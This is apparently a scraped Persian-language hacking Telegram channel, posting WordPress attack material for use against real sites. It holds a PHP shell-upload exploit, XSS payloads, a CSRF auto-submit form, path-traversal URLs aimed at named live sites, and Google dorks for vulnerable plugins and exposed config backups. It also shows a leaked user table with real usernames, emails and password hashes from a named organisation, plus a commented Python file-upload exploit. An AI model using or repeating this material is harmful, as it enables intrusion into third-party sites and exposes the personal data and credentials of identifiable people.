http://nirvanasurfyoga.com/wp-login.php
username = nirva0
😂
pass = ro ham khodetoon crack konid
~~~~~~~~~~~~~~~~~~~~~
@LearnExploit
#Target #Wp #Wordpress
username = nirva0
😂
pass = ro ham khodetoon crack konid
~~~~~~~~~~~~~~~~~~~~~
@LearnExploit
#Target #Wp #Wordpress
ابزار #V3n0M
اسکنر قدرتمند V3n0M
===============================
امکانات 👇
1- اسکن باگ های XSS,RCE,LFI،SQL I
2- لیست های بسیار بزرگ دورک
3- پیدا کردن صفحه ادمین
4- اسکن ftp برای نفوذ
5-حملات برت فورس
=======================
https://github.com/v3n0m-Scanner/V3n0M-Scanner
~~~~~~~~~~~~~~~~~~~~~
@LearnExploit
#Target #Wp #Wordpress
اسکنر قدرتمند V3n0M
===============================
امکانات 👇
1- اسکن باگ های XSS,RCE,LFI،SQL I
2- لیست های بسیار بزرگ دورک
3- پیدا کردن صفحه ادمین
4- اسکن ftp برای نفوذ
5-حملات برت فورس
=======================
https://github.com/v3n0m-Scanner/V3n0M-Scanner
~~~~~~~~~~~~~~~~~~~~~
@LearnExploit
#Target #Wp #Wordpress
GitHub
GitHub - v3n0m-Scanner/V3n0M-Scanner: Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns - v3n0m-Scanner/V3n0M-Scanner
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
POC
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
POC اسیب پذیریه XSS در پلاگین (All In One Favicon ) : #XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon 0Day.Today Boy's @LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
⚡1
اسیب پذیری فایل دانلود در تم وردپرس
#Exploit - #Dork - #WP - #Theme
--------
#Title : UWordpress dreamsmiths Themes Arbitrary File Download
#Dorks :
1. inurl:/wp-content/themes/fiestaresidences/
2. inurl:wp-content/themes/hsv/
3. inurl:wp-content/themes/erinvale/
#P0c :
نحوه ی اکسپلویت یکی از اکسپلویت های زیر رو به URL تارگت خود اضافه کنید.
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php
#Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
/--//--//--//--//--//--//--//--/
T.me/LearnExploit
0Day.Today Boy's
#Exploit - #Dork - #WP - #Theme
--------
#Title : UWordpress dreamsmiths Themes Arbitrary File Download
#Dorks :
1. inurl:/wp-content/themes/fiestaresidences/
2. inurl:wp-content/themes/hsv/
3. inurl:wp-content/themes/erinvale/
#P0c :
نحوه ی اکسپلویت یکی از اکسپلویت های زیر رو به URL تارگت خود اضافه کنید.
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php
#Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
/--//--//--//--//--//--//--//--/
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#DoRk - #Wp_Config (.bak = backup file ) #file
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Table ( #WP_USERS )
TARGET :
~~~~~~~~~~~~~~~~~~~~~
Table :: wp_users ::
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
INSERT INTO
در خط سوم میتونید user & pass ادمین سایت رو مشاهده کنید.
~~~~~~~~~~~~~~~~~~~~~~~~
Hash Type : MD5
~~~~~~~~~~~~~~~~~~~~~~~~
join us : @LearnExploit
TARGET :
http://www.tecpar.br
~~~~~~~~~~~~~~~~~~~~~
Table :: wp_users ::
INSERT INTO
wp_users
VALUES (1, 'redsuns', '$P$B5gzRPWnESH0U27g0dx2aqir9y1Hme1', 'redsuns', 'contato@redsuns.com.br', '', '2014-06-09 20:02:50', '', 0, 'redsuns') ; INSERT INTO
wp_users
VALUES (2, 'valteny', '$P$BFxx.haMMjfsMXzPepsnrRJNSnmNC70', 'valteny', 'valteny@gmail.com', '', '2014-08-13 18:10:45', '', 0, 'valteny') ; INSERT INTO
wp_users
VALUES (3, 'admin', '$P$BC0Vcu19HXeXaoTVwY9NfZbo7YwEWk/', 'admin', '', '', '2014-11-18 17:49:38', '', 0, 'admin') ; INSERT INTO
wp_users
VALUES (4, 'eduardo', '$P$BJcdTwweAUbkp01Rgxp1mTWr.Qa.bn1', 'eduardo', '', '', '2014-11-18 17:49:38', '', 0, 'eduardo') ; INSERT INTO
wp_users
VALUES (5, 'akloster', '$P$BnsdAolKCuWQpIiMQubH8FBWuhnqss0', 'akloster', '', '', '2014-11-18 17:49:38', '', 0, 'akloster') ; INSERT INTO
wp_users
VALUES (6, 'anderson', '$P$BmCs/9/PP1g1ROREeyaTrQSjqxQg9z1', 'anderson', '', '', '2014-11-18 17:49:38', '', 0, 'anderson') ; INSERT INTO
wp_users
VALUES (7, 'felipedp', '$P$Btq7wytzkMqc8FtBZxvIns.YZ90wJF1', 'felipedp', '', '', '2014-11-18 17:49:38', '', 0, 'felipedp') ; INSERT INTO
wp_users
VALUES (8, 'sayron', '$P$B7SqhCedBYK6vIuozsw/PkoBRvy9Zx0', 'sayron', 'ssouza@tecpar.br', '', '2014-11-18 17:49:38', '', 0, 'sayron') ; INSERT INTO
wp_users
VALUES (9, 'joceli', '$P$BSDjYRoVYvrVc8JhIh0wjTcqWYySL6.', 'joceli', '', '', '2014-11-18 17:49:38', '', 0, 'joceli') ; INSERT INTO
wp_users
VALUES (10, 'vjsantos', '$P$BcTq5lNJxVVNCXhG/UL.aLacibtZo8.', 'vjsantos', '', '', '2014-11-18 17:49:38', '', 0, 'vjsantos') ; INSERT INTO
wp_users
VALUES (11, 'lidiarom', '$P$B2RwmcxxVynttd6kWo.j0TSR55PSVH0', 'lidiarom', '', '', '2014-11-18 17:49:38', '', 0, 'lidiarom') ; INSERT INTO
wp_users
VALUES (12, 'Simone', '$P$BCpC.MQuKlCT.Z.BD34q/uEWVMZ1AP.', 'simone', '', '', '2014-11-18 17:49:38', '', 0, 'Simone') ; INSERT INTO
wp_users
VALUES (13, 'rosi', '$P$BDBvlJd.vYH0Ty/FJ1AvGbkrXSrD0J.', 'rosi', '', '', '2014-11-18 17:49:38', '', 0, 'rosi') ; INSERT INTO
wp_users
VALUES (14, 'magnani', '$P$BaUc454/TNcQYLqTLSYpj92KsZ3quK0', 'magnani', '', '', '2014-11-18 17:49:38', '', 0, 'magnani') ; INSERT INTO
wp_users
VALUES (15, 'euzilene', '$P$Bxy/ALTHpZCJ8Tw6.V/KyVm7P2o/i./', 'euzilene', '', '', '2014-11-18 17:49:38', '', 0, 'euzilene') ; INSERT INTO
wp_users
VALUES (16, 'silvane', '$P$B.v3pkDM6L3sL.mT6Rmdj64Q3QHKbY0', 'silvane', '', '', '2014-11-18 17:49:38', '', 0, 'silvane') ; INSERT INTO
wp_users
VALUES (17, 'jdonanski', '$P$BM538R7Ji0UWXH/uwvXOXTS6J2D4a3/', 'jdonanski', '', '', '2014-11-18 17:49:38', '', 0, 'jdonanski') ; INSERT INTO
wp_users
VALUES (18, 'dpontes', '$P$Bt8xboLPfOmyJlQdHVBnxyajCGK..P/', 'dpontes', '', '', '2014-11-18 17:49:38', '', 0, 'dpontes') ; INSERT INTO
wp_users
VALUES (19, 'rico', '$P$BnjBqbFjQNjatAxAmRS1SdwQbOg67x0', 'rico', '', '', '2014-11-18 17:49:38', '', 0, 'rico') ; INSERT INTO
wp_users
VALUES (20, 'joaops', '$P$BzqZb556wPsQhzcTBQOCeitW5l4kNx/', 'joaops', '', '', '2014-11-18 17:49:38', '', 0, 'joaops') ; INSERT INTO
wp_users
VALUES (21, 'julianed', '$P$BMCplNCWk0JJPDcGvq76we8bQozVgX.', 'julianed', '', '', '2014-11-18 17:49:38', '', 0, 'julianed') ; INSERT INTO
wp_users
VALUES (22, 'rafaelms', '$P$Blxti6CcAtks1/q7onXTJ.3ZkmyU7P.', 'rafaelms', '', '', '2014-11-18 17:49:38', '', 0, 'rafaelms') ; INSERT INTO
wp_users
VALUES (23, 'vcarraro', '$P$BKX5HiC0Pr7RmKXF1s0cPK.3Uh99YT1', 'vcarraro', '', '', '2014-11-18 17:49:38', '', 0, 'vcarraro') ; INSERT INTO
wp_users
VALUES (24, 'danielagp', '$P$BtaERjGw1UmkuL1JTCWuKRNlgg3Kr2/', 'danielagp', '', '', '2014-11-18 17:49:39', '', 0, 'danielagp') ; INSERT INTO
wp_users
VALUES (25, 'joseph', '$P$BJwZI6Bfumt9SP9BjZuem4xINV5L2W.', 'joseph', '', '', '2014-11-18 17:49:39', '', 0, 'joseph') ; INSERT INTO
wp_users
VALUES (26, 'suzanac', '$P$BohN6rm87x8GEFue9M1NL8vdtxaKG2.', 'suzanac', '', '', '2014-11-18 17:49:39', '', 0, 'suzanac') ;در خط سوم میتونید user & pass ادمین سایت رو مشاهده کنید.
~~~~~~~~~~~~~~~~~~~~~~~~
Hash Type : MD5
~~~~~~~~~~~~~~~~~~~~~~~~
join us : @LearnExploit
#Target #wp #Database
——————————
Target :
Database :
file size : 1.6G
——————————-
T.me/LearnExploit
——————————
Target :
https://www.carisma.net/
\-------------\
Database :
yon.ir/SPRfx
\-------------\
file size : 1.6G
——————————-
T.me/LearnExploit
Forwarded from اتچ بات
Telegram
〽️ #Upload - #Shell - (#WP_v_5_0_3) #WordPress v 5.0.3 - #Part_1
➖➖➖➖➖➖➖➖
🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit
⁉️ دانلود در پست بعدی...
➖➖➖➖➖➖➖➖
✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖
🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit
⁉️ دانلود در پست بعدی...
➖➖➖➖➖➖➖➖
✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's
〽️ #Upload - #Shell - (#WP_v_5_0_3) #WordPress v 5.0.3 - #Part_1
➖➖➖➖➖➖➖➖
🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit
➖➖➖➖➖➖➖➖
✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖
🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit
➖➖➖➖➖➖➖➖
✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's
Telegram
AttachLearnExploit
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
This media is not supported in your browser
VIEW IN TELEGRAM
POC
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
